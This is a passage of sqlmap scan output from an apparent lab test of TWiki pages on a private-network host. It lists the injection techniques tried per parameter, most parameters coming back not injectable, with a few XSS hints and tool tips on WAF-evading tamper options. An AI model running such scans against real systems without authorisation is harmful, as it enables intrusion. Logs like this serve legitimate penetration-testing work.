[19:44:03] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:44:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:44:04] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:44:05] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:44:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:44:07] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:44:08] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:44:08] [INFO] testing 'Oracle AND time-based blind' | |
[19:44:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:44:09] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:44:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:44:32] [WARNING] GET parameter 'skin' is not injectable | |
[19:44:32] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 129: | |
GET http://192.168.1.113:80/twiki/bin/rdiff/Sandbox/WebHome?rev1=1.8&rev2=1.7 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:44:32] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/Sandbox/WebHome?rev1=1.8&rev2=1.7' | |
[19:44:32] [INFO] testing connection to the target URL | |
[19:44:32] [INFO] testing if the target URL is stable | |
[19:44:33] [INFO] target URL is stable | |
[19:44:33] [INFO] testing if GET parameter 'rev1' is dynamic | |
[19:44:33] [WARNING] GET parameter 'rev1' does not appear dynamic | |
[19:44:33] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[19:44:33] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[19:44:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:44:34] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:44:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:44:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:44:35] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:44:36] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:44:37] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:44:37] [INFO] testing 'MySQL inline queries' | |
[19:44:37] [INFO] testing 'PostgreSQL inline queries' | |
[19:44:37] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:44:37] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:44:37] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:44:38] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:44:38] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:44:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:44:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:44:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:44:40] [INFO] testing 'Oracle AND time-based blind' | |
[19:44:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:44:41] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:44:47] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:44:54] [WARNING] GET parameter 'rev1' is not injectable | |
[19:44:54] [INFO] testing if GET parameter 'rev2' is dynamic | |
[19:44:54] [WARNING] GET parameter 'rev2' does not appear dynamic | |
[19:44:54] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[19:44:54] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[19:44:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:44:55] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:44:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:44:57] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:44:57] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:44:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:44:58] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:44:58] [INFO] testing 'MySQL inline queries' | |
[19:44:59] [INFO] testing 'PostgreSQL inline queries' | |
[19:44:59] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:44:59] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:45:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:45:00] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:45:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:45:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:45:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:45:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:45:04] [INFO] testing 'Oracle AND time-based blind' | |
[19:45:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:45:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:45:17] [WARNING] GET parameter 'rev2' is not injectable | |
[19:45:17] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 130: | |
GET http://192.168.1.113:80/twiki/bin/view/Sandbox/WebHome?rev=1.7 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:45:17] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Sandbox/WebHome?rev=1.7' | |
[19:45:17] [INFO] testing connection to the target URL | |
[19:45:18] [INFO] testing if the target URL is stable | |
[19:45:19] [INFO] target URL is stable | |
[19:45:19] [INFO] testing if GET parameter 'rev' is dynamic | |
[19:45:19] [WARNING] GET parameter 'rev' does not appear dynamic | |
[19:45:19] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[19:45:19] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks | |
[19:45:19] [INFO] testing for SQL injection on GET parameter 'rev' | |
[19:45:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:45:19] [WARNING] reflective value(s) found and filtering out | |
[19:45:21] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:45:21] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:45:21] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:45:22] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:45:23] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:45:23] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:45:23] [INFO] testing 'MySQL inline queries' | |
[19:45:23] [INFO] testing 'PostgreSQL inline queries' | |
[19:45:24] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:45:24] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:45:24] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:45:25] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:45:25] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:45:25] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:45:26] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:45:27] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:45:27] [INFO] testing 'Oracle AND time-based blind' | |
[19:45:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:45:28] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:45:35] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:45:43] [WARNING] GET parameter 'rev' is not injectable | |
[19:45:43] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[19:45:43] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Sandbox/WebHome?rev1=1.7&rev2=1.6' | |
[19:45:43] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Sandbox/WebHome?rev=1.6' | |
URL 131: | |
GET http://192.168.1.113:80/twiki/bin/oops/Sandbox/WebHome?template=oopsmore¶m1=1.8¶m2=1.8 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:45:43] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/Sandbox/WebHome?template=oopsmore¶m1=1.8¶m2=1.8' | |
[19:45:43] [INFO] testing connection to the target URL | |
[19:45:43] [INFO] testing if the target URL is stable | |
[19:45:44] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[19:45:44] [INFO] testing if GET parameter 'template' is dynamic | |
[19:45:44] [INFO] confirming that GET parameter 'template' is dynamic | |
[19:45:44] [INFO] GET parameter 'template' is dynamic | |
[19:45:44] [INFO] heuristics detected web page charset 'ascii' | |
[19:45:44] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[19:45:44] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks | |
[19:45:44] [INFO] testing for SQL injection on GET parameter 'template' | |
[19:45:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:45:44] [WARNING] reflective value(s) found and filtering out | |
[19:45:45] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:45:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:45:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:45:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:45:47] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:45:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:45:47] [INFO] testing 'MySQL inline queries' | |
[19:45:47] [INFO] testing 'PostgreSQL inline queries' | |
[19:45:47] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:45:47] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:45:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:45:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:45:49] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:45:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:45:50] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:45:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:45:51] [INFO] testing 'Oracle AND time-based blind' | |
[19:45:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:45:51] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:45:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:46:01] [WARNING] GET parameter 'template' is not injectable | |
[19:46:01] [INFO] testing if GET parameter 'param1' is dynamic | |
[19:46:01] [WARNING] GET parameter 'param1' does not appear dynamic | |
[19:46:01] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[19:46:01] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks | |
[19:46:01] [INFO] testing for SQL injection on GET parameter 'param1' | |
[19:46:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:46:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:46:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:46:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:46:04] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:46:05] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:46:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:46:05] [INFO] testing 'MySQL inline queries' | |
[19:46:05] [INFO] testing 'PostgreSQL inline queries' | |
[19:46:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:46:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:46:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:46:07] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:46:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:46:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:46:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:46:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:46:09] [INFO] testing 'Oracle AND time-based blind' | |
[19:46:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:46:14] [INFO] target URL appears to be UNION injectable with 1 columns | |
[19:46:14] [WARNING] applying generic concatenation with double pipes ('||') | |
[19:46:14] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql') | |
[19:46:15] [INFO] target URL appears to be UNION injectable with 10 columns | |
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y | |
[19:46:19] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') | |
[19:46:20] [INFO] testing 'MySQL UNION query (63) - 1 to 10 columns' | |
[19:46:27] [WARNING] GET parameter 'param1' is not injectable | |
[19:46:27] [INFO] testing if GET parameter 'param2' is dynamic | |
[19:46:27] [WARNING] GET parameter 'param2' does not appear dynamic | |
[19:46:27] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable | |
[19:46:27] [INFO] testing for SQL injection on GET parameter 'param2' | |
[19:46:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:46:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:46:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:46:29] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:46:30] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:46:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:46:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:46:31] [INFO] testing 'MySQL inline queries' | |
[19:46:31] [INFO] testing 'PostgreSQL inline queries' | |
[19:46:31] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:46:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:46:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:46:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:46:33] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:46:33] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:46:34] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:46:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:46:35] [INFO] testing 'Oracle AND time-based blind' | |
[19:46:35] [INFO] testing 'Generic UNION query (63) - 1 to 10 columns' | |
[19:46:42] [INFO] testing 'MySQL UNION query (63) - 1 to 10 columns' | |
[19:46:49] [WARNING] GET parameter 'param2' is not injectable | |
[19:46:49] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 132: | |
GET http://192.168.1.113/twiki/bin/search/Main/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=100 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:46:49] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/Main/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=100' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[19:46:49] [INFO] testing connection to the target URL | |
[19:46:49] [INFO] testing if the target URL is stable | |
[19:46:50] [INFO] target URL is stable | |
[19:46:50] [INFO] testing if URI parameter '#1*' is dynamic | |
[19:46:50] [INFO] confirming that URI parameter '#1*' is dynamic | |
[19:46:50] [INFO] URI parameter '#1*' is dynamic | |
[19:46:50] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[19:46:51] [INFO] testing for SQL injection on URI parameter '#1*' | |
[19:46:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:46:52] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:46:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:46:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:46:53] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:46:53] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:46:54] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:46:54] [INFO] testing 'MySQL inline queries' | |
[19:46:54] [INFO] testing 'PostgreSQL inline queries' | |
[19:46:54] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:46:54] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:46:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:46:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:46:55] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:46:56] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:46:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:46:57] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:46:57] [INFO] testing 'Oracle AND time-based blind' | |
[19:46:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:46:58] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:47:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:47:26] [WARNING] URI parameter '#1*' is not injectable | |
[19:47:26] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 133: | |
GET http://192.168.1.113/twiki/bin/search/Main/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=200 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:47:26] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/Main/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=200' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[19:47:26] [INFO] testing connection to the target URL | |
[19:47:28] [INFO] testing if the target URL is stable | |
[19:47:28] [INFO] target URL is stable | |
[19:47:28] [INFO] testing if URI parameter '#1*' is dynamic | |
[19:47:29] [INFO] confirming that URI parameter '#1*' is dynamic | |
[19:47:29] [INFO] URI parameter '#1*' is dynamic | |
[19:47:29] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[19:47:30] [INFO] testing for SQL injection on URI parameter '#1*' | |
[19:47:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:47:33] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:47:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:47:36] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:47:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:47:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:47:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:47:42] [INFO] testing 'MySQL inline queries' | |
[19:47:42] [INFO] testing 'PostgreSQL inline queries' | |
[19:47:43] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:47:43] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:47:44] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:47:46] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:47:47] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:47:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:47:50] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:47:52] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:47:54] [INFO] testing 'Oracle AND time-based blind' | |
[19:47:56] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:47:56] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:48:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:48:35] [WARNING] URI parameter '#1*' is not injectable | |
[19:48:35] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 134: | |
GET http://192.168.1.113/twiki/bin/search/Main/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=400 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:48:35] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/Main/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=400' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[19:48:35] [INFO] testing connection to the target URL | |
[19:48:36] [INFO] testing if the target URL is stable | |
[19:48:37] [INFO] target URL is stable | |
[19:48:37] [INFO] testing if URI parameter '#1*' is dynamic | |
[19:48:37] [INFO] confirming that URI parameter '#1*' is dynamic | |
[19:48:37] [INFO] URI parameter '#1*' is dynamic | |
[19:48:38] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[19:48:38] [INFO] testing for SQL injection on URI parameter '#1*' | |
[19:48:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:48:42] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:48:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:48:44] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:48:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:48:47] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:48:49] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:48:49] [INFO] testing 'MySQL inline queries' | |
[19:48:50] [INFO] testing 'PostgreSQL inline queries' | |
[19:48:50] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:48:51] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:48:52] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:48:53] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:48:55] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:48:56] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:48:58] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:49:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:49:01] [INFO] testing 'Oracle AND time-based blind' | |
[19:49:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:49:03] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:49:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:49:24] [WARNING] URI parameter '#1*' is not injectable | |
[19:49:24] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 135: | |
GET http://192.168.1.113/twiki/bin/search/Main/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=800 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:49:24] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/Main/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=800' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[19:49:24] [INFO] testing connection to the target URL | |
[19:49:25] [INFO] testing if the target URL is stable | |
[19:49:25] [INFO] target URL is stable | |
[19:49:25] [INFO] testing if URI parameter '#1*' is dynamic | |
[19:49:25] [INFO] confirming that URI parameter '#1*' is dynamic | |
[19:49:26] [INFO] URI parameter '#1*' is dynamic | |
[19:49:26] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[19:49:26] [INFO] testing for SQL injection on URI parameter '#1*' | |
[19:49:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:49:27] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:49:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:49:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:49:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:49:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:49:29] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:49:29] [INFO] testing 'MySQL inline queries' | |
[19:49:29] [INFO] testing 'PostgreSQL inline queries' | |
[19:49:30] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:49:30] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:49:30] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:49:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:49:31] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:49:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:49:32] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:49:33] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
